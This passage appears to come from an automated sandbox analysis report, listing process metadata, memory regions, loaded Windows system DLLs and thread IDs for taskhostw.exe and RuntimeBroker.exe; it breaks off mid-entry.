os_pid = "0x5f4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "taskhostw.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2526
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2527
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2528
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2529
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2530
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2531
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2532
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2533
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2534
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2535
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2536
start_va = 0x7ff67cd20000
end_va = 0x7ff67cd38fff
monitored = 0
entry_point = 0x7ff67cd259b0
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 2537
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2538
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2539
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2540
start_va = 0x410000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2541
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2542
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2543
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2544
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2545
start_va = 0x510000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 2546
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2547
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2548
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2549
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2550
start_va = 0x590000
end_va = 0x6effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2551
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2556
start_va = 0x590000
end_va = 0x6d2fff
monitored = 0
entry_point = 0x5b8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2557
start_va = 0x6e0000
end_va = 0x6effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006e0000"
filename = ""
Region:
id = 2558
start_va = 0x590000
end_va = 0x66cfff
monitored = 0
entry_point = 0x5ee0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2559
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2560
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2561
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2563
start_va = 0x590000
end_va = 0x60ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2564
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2565
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2566
start_va = 0x610000
end_va = 0x648fff
monitored = 0
entry_point = 0x6112f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2567
start_va = 0x6f0000
end_va = 0x877fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 2568
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2569
start_va = 0x880000
end_va = 0xa00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 2570
start_va = 0xa10000
end_va = 0x1e0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a10000"
filename = ""
Region:
id = 2571
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2572
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2573
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskhostw.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")
Region:
id = 2574
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2575
start_va = 0x610000
end_va = 0x610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 2576
start_va = 0x7ff85c960000
end_va = 0x7ff85c9f5fff
monitored = 0
entry_point = 0x7ff85c985570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2577
start_va = 0x1e10000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 2579
start_va = 0x7ff85f680000
end_va = 0x7ff85f7d9fff
monitored = 0
entry_point = 0x7ff85f6c38e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2580
start_va = 0x620000
end_va = 0x620fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2581
start_va = 0x620000
end_va = 0x6dbfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2582
start_va = 0x1e10000
end_va = 0x1e13fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e10000"
filename = ""
Region:
id = 2583
start_va = 0x1f70000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2584
start_va = 0x7ff85bf70000
end_va = 0x7ff85bf91fff
monitored = 0
entry_point = 0x7ff85bf71a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2585
start_va = 0x1e20000
end_va = 0x1e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e20000"
filename = ""
Region:
id = 2586
start_va = 0x1ea0000
end_va = 0x1ea0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ea0000"
filename = ""
Region:
id = 2587
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2588
start_va = 0x1eb0000
end_va = 0x1eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 2589
start_va = 0x7ff855e80000
end_va = 0x7ff855f78fff
monitored = 0
entry_point = 0x7ff855ec8000
region_type = mapped_file
name = "settingsynccore.dll"
filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll")
Region:
id = 2592
start_va = 0x1ec0000
end_va = 0x1ec1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ec0000"
filename = ""
Region:
id = 2593
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2594
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2595
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2596
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2597
start_va = 0x7ff85d9c0000
end_va = 0x7ff85d9d6fff
monitored = 0
entry_point = 0x7ff85d9c79d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2599
start_va = 0x7ff855c40000
end_va = 0x7ff855d0dfff
monitored = 0
entry_point = 0x7ff855c714c0
region_type = mapped_file
name = "tokenbroker.dll"
filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll")
Region:
id = 2615
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2616
start_va = 0x1f80000
end_va = 0x205cfff
monitored = 0
entry_point = 0x1fde0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2618
start_va = 0x1ed0000
end_va = 0x1f4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ed0000"
filename = ""
Region:
id = 2619
start_va = 0x1f80000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 2620
start_va = 0x2000000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 2692
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2693
start_va = 0x2080000
end_va = 0x20adfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002080000"
filename = ""
Region:
id = 2700
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Thread:
id = 206
os_tid = 0x5f8
Thread:
id = 208
os_tid = 0x604
Thread:
id = 210
os_tid = 0x60c
Thread:
id = 211
os_tid = 0x610
Thread:
id = 214
os_tid = 0x61c
Thread:
id = 215
os_tid = 0x628
Thread:
id = 216
os_tid = 0x62c
Process:
id = "12"
image_name = "runtimebroker.exe"
filename = "c:\\windows\\system32\\runtimebroker.exe"
page_root = "0x2fd46000"
os_pid = "0x640"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "rpc_server"
parent_id = "11"
os_parent_pid = "0x274"
cmd_line = "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2642
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2643
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2644
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2645
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2646
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2647
start_va = 0xe0000
end_va = 0xe1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2648
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2649
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2650
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2651
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2652
start_va = 0x1f0000
end_va = 0x1f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2653
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2654
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2655
start_va = 0x500000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 2656
start_va = 0x580000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2657
start_va = 0x600000
end_va = 0x606fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2658
start_va = 0x610000
end_va = 0x68ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 2659
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 2660
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 2661
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 2662
start_va = 0xb20000
end_va = 0x1f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 2663
start_va = 0x1f20000
end_va = 0x1f9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 2664
start_va = 0x1fa0000
end_va = 0x201ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 2665
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2666
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2667
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2668
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2669
start_va = 0x7ff623770000
end_va = 0x7ff623786fff
monitored = 0
entry_point = 0x7ff6237744f0
region_type = mapped_file
name = "runtimebroker.exe"
filename = "\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")
Region:
id = 2670
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2671
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2672
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2673
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2674
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2675
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2676
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2677
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2678
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2679
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2680
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2681
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2682
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2683
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2684
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2685
start_va = 0x7ff855c40000
end_va = 0x7ff855d0dfff
monitored = 0
entry_point = 0x7ff855c714c0
region_type = mapped_file
name = "tokenbroker.dll"
filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll")
Region:
id = 2686
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2687
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2688
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2689
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2691
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2694
start_va = 0x7ff85c6f0000
end_va = 0x7ff85c702fff
monitored = 0
entry_point = 0x7ff85c6f2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2695
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2696
start_va = 0x7ff8570c0000
end_va = 0x7ff8570e7fff
monitored = 0
entry_point = 0x7ff8570c8c10
region_type = mapped_file
name = "idstore.dll"
filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll")
Region:
id = 2697
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2698
start_va = 0x7ff85c690000
